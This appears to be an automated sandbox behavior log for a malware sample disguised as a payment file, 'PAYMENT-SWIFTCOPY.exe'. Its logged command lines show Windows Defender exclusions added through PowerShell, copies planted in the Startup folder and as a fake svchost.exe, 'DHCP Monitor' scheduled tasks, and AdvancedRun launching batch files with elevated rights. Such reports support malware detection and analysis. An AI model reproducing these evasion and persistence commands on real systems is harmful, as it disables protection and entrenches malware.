              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe'
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
              Source: unknownProcess created: C:\Windows\Cursors\???????????????\svchost.exe 'C:\Windows\Cursors\???????????????\svchost.exe'
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3492 -ip 3492
              Source: unknownProcess created: C:\Windows\Cursors\???????????????\svchost.exe 'C:\Windows\Cursors\???????????????\svchost.exe'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAEFD.tmp'
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 2996
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpB92F.tmp'
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 0
              Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Source: C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe' /SpecialRun 4101d8 4976
              Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe' /SpecialRun 4101d8 6792
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /SpecialRun 4101d8 5668
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe' /SpecialRun 4101d8 7008
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 2996Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,3_2_00408FC9
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,4_2_00408FC9
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0fafJump to behavior
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmp, ???????????????.exe, 00000016.00000000.303619783.0000000000AF2000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,3_2_004095FD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.274141724.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbO source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: c.pdbis source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: iVisualBasic.pdb source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmp
              Source: Binary string: \??\C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.PDB source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbW source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdblm source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393531655.0000000005CF0000.00000004.00000001.sdmp
